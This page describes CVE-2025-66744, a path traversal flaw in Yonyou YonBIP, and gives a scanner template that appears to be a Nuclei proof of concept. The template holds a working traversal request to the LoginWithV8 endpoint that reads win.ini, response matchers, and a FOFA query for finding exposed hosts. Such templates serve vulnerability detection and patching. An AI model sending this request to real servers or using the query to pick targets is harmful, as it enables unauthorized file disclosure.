CVE-2025-66744: Yonyou YonBIP - Path Traversal

2026-02-24 Yonyou YonBIP PoC Public

Description

Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.

PoC

id: CVE-2025-66744

info:
  name: Yonyou YonBIP - Path Traversal
  author: DhiyaneshDk
  severity: high
  description: |
    Yonyou YonBIP v3 and before contains a path traversal caused by improper validation in the LoginWithV8 interface of the series data application service system, letting unauthorized attackers access sensitive information.
  impact: |
    Unauthorized attackers can access sensitive system information, potentially leading to data exposure.
  remediation: |
    Update to the latest version beyond v3.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-66744
    - https://github.com/iSee857/YonYouBip-path-travel
  classification:
    cve-id: CVE-2025-66744
    epss-score: 0.01567
    epss-percentile: 0.74066
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="YonBIP | 数据应用服务"
  tags: cve,cve2025,yonbip,lfi,vkev

http:
  - raw:
      - |
        GET /bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "[fonts]"
          - "[extensions]"
          - "Message"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b4e80349b094b90310ec651aac218580522bc58eefc64743c61425f33b89f8b702203b228ed479c3df01b0e8f98a0898ef310aa3e938c10a29268422f09f7889569f:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities